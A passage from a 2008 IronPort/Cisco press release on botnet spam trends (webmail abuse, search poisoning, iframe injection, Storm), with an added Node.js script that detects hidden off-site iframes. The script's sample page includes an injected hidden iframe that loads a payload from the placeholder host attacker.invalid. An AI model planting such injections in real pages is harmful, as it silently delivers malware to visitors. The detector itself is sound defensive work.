-- Webmail spam. Sophisticated bots, working in conjunction with automated and manual CAPTCHA-breaking processes, are creating large numbers of free webmail accounts. ("CAPTCHA" stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart. A common CAPTCHA test requires the user to type a series of distorted letters and numbers to show that the response is not computer-generated.) Once the accounts exist, the bots send spam through them, so the recipient sees messages that originate from a legitimate ISP's mail servers rather than from the botnet. These "theft of reputation" attacks accounted for more than 5 percent of all spam in the first quarter of 2008, up from less than 1 percent the previous quarter.

-- Google exploitation. Next-generation malware is using Google's "I'm Feeling Lucky" search option to channel traffic to infected sites. An estimated 1.3 percent of all Google searches return malware sites as valid results. Given the volume of searches carried out every minute, this is a potentially huge opportunity for malware distributors.

-- iFrame injections. This is a redirection that happens when a user visits a website with malicious code, such as JavaScript, embedded in it. These websites can appear to be well-known, "legitimate" websites, or they can be purpose-built botsites that rank high in search engine results. The JavaScript instructs the browser to fetch a file from another web server that hosts the actual Trojan, often through an embedded iFrame. The Trojan then installs in the background without the user's knowledge. Once installed, it can do a number of things, such as stealing passwords or system data.

The botnets examined in the report are unique in that they tied spam campaigns to current events or websites of interest, using a blend of email and the web to propagate.
Additionally, these decentralized and highly coordinated attacks enabled a range of Internet assaults, from email and blog spam to phishing, instant messaging (IM) attacks and distributed denial-of-service (DDoS) attacks. Storm was the first malware in this wave of sophisticated social engineering, affecting a cumulative 40 million computers worldwide between January 2007 and February 2008, according to IronPort researchers. At its peak in July 2007, Storm accounted for more than 20 percent of all spam and was active on 1.4 million infected computers simultaneously; it went on infecting or reinfecting about 900,000 computers per month. By September 2007, the number of computers simultaneously generating Storm messages had fallen to 280,000 a day, and Storm's share had dropped to 4 percent of all spam. Storm now represents only a tiny sliver of the more than 161 billion spam messages sent every day, yet variants of it remain active.

In addition to assessing the damage from such social-engineering-based attacks, the report details trends that portend the future of spam and viruses, and the measures businesses should take to ensure that their networks are protected. Spam is no longer merely an irritation created by individuals seeking glory. It has morphed into organized, technically savvy, well-funded malware operations comparable in scale to the business operations of legitimate software vendors. To increase efficiency and profitability, malware creators are even beginning to offer their products as complete solutions, including technical support, analytics and administration tools, and software updates. Among the recent botnet malware discoveries are Bobax, Kraken/Kracken and Srizbi.
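The hidden-iframe redirection described under "iFrame injections" above leaves a recognizable trace in the served HTML: an iframe the visitor cannot see that pulls content from a host other than the page's own. The following is an added example, not code from the IronPort report or from Cisco. It is a Node.js script that extracts every iframe tag from a constructed sample page and flags those that are both hidden (1x1 or styled invisible) and off-site. The hostnames example.org (the legitimate site) and attacker.invalid (the Trojan host) are placeholders.

```javascript
// Added example (not from the IronPort report): flag hidden, off-site
// iframes of the kind used in the injections described above.
// Constructed sample of a compromised page. example.org stands for the
// legitimate site; attacker.invalid is a placeholder for the Trojan host.
const SAMPLE_PAGE = `
<html><body>
<h1>Welcome</h1>
<iframe src="https://example.org/video" width="640" height="360"></iframe>
<script>
document.write('<iframe src="http://attacker.invalid/load.php" width="1" height="1" style="visibility:hidden"></iframe>');
</script>
<iframe src="/about" style="display:none"></iframe>
</body></html>`;

// Return one attribute map per <iframe ...> opening tag in the HTML.
// Each tag is matched up to its first '>', so the script-written iframe
// above is still seen because it appears literally in the page source.
function extractIframes(html) {
  const tags = html.match(/<iframe\b[^>]*>/gi) || [];
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  return tags.map((tag) => {
    const attrs = {};
    let m;
    attrRe.lastIndex = 0;
    while ((m = attrRe.exec(tag)) !== null) {
      const value = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
      attrs[m[1].toLowerCase()] = value;
    }
    return attrs;
  });
}

// An iframe the visitor cannot see: 1x1 (or smaller) or styled invisible.
function isHidden(attrs) {
  const w = parseInt(attrs.width, 10);
  const h = parseInt(attrs.height, 10);
  const tiny = (!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1);
  const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
  const invisible = /display:none|visibility:hidden/.test(style);
  return tiny || invisible;
}

// True when the iframe loads from a host other than the page's own.
// Relative URLs resolve against the page host and so count as same-site.
function isOffSite(src, pageHost) {
  try {
    return new URL(src, `https://${pageHost}/`).hostname !== pageHost.toLowerCase();
  } catch (e) {
    return false; // unparseable src: leave it for manual review
  }
}

// The report's pattern: an invisible iframe that pulls content from a
// third-party server. Returns the offending src values for triage.
function findSuspiciousIframes(html, pageHost) {
  return extractIframes(html)
    .filter((a) => a.src && isHidden(a) && isOffSite(a.src, pageHost))
    .map((a) => a.src);
}

console.log(findSuspiciousIframes(SAMPLE_PAGE, 'example.org'));
```

Run against the sample, the scan reports only the attacker.invalid frame: the 640x360 video frame is visible, and the display:none /about frame is same-site. Two caveats for real use: a static scan only catches iframes that appear literally in the served HTML, so injected scripts that assemble the tag from encoded strings at runtime must be caught by rendering the page in a browser engine instead; and hidden cross-origin frames are also used by legitimate analytics and ad code, so treat a hit as a triage signal rather than proof of compromise.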
To prevent the spread of botnets such as Storm and its successors, IronPort's report recommends that every business employ spam filtering, assess its web reputation, monitor port and communications activity, and keep all antivirus and antimalware products updated. The full update can be found online at http://www.ironport.com/trends.

About IronPort Systems

IronPort Systems, now part of Cisco, is headquartered in San Bruno, Calif. IronPort is the leading provider of antispam, antivirus and antispyware appliances for organizations ranging from small businesses to the Global 2000. IronPort appliances utilize SenderBase®, the world's largest email and web threat-detection network and database. IronPort products are innovative and easy-to-use, providing breakthrough performance and playing a mission-critical role in a company's network infrastructure. To learn more about IronPort products and services, please visit: http://www.ironport.com/.

Copyright © 2008 Cisco Systems, Inc. All rights reserved. IronPort, the IronPort logo and SenderBase are registered trademarks of Cisco Systems, Inc. All other trademarks are the property of Cisco Systems, Inc. or their respective owners. While every effort is made to ensure the information given is accurate, Cisco does not accept liability for any errors or mistakes which may arise. Specifications and other information in this document may be subject to change without notice.

For direct RSS Feeds of all Cisco news, please visit "News@Cisco" at the following link: http://newsroom.cisco.com/dlls/rss.html
Contact Information: Press / Analysts
If you are a reporter or analyst and want more information on IronPort Systems, please contact:
David Oro, IronPort Systems, 707.558.8585, oro@ironport.com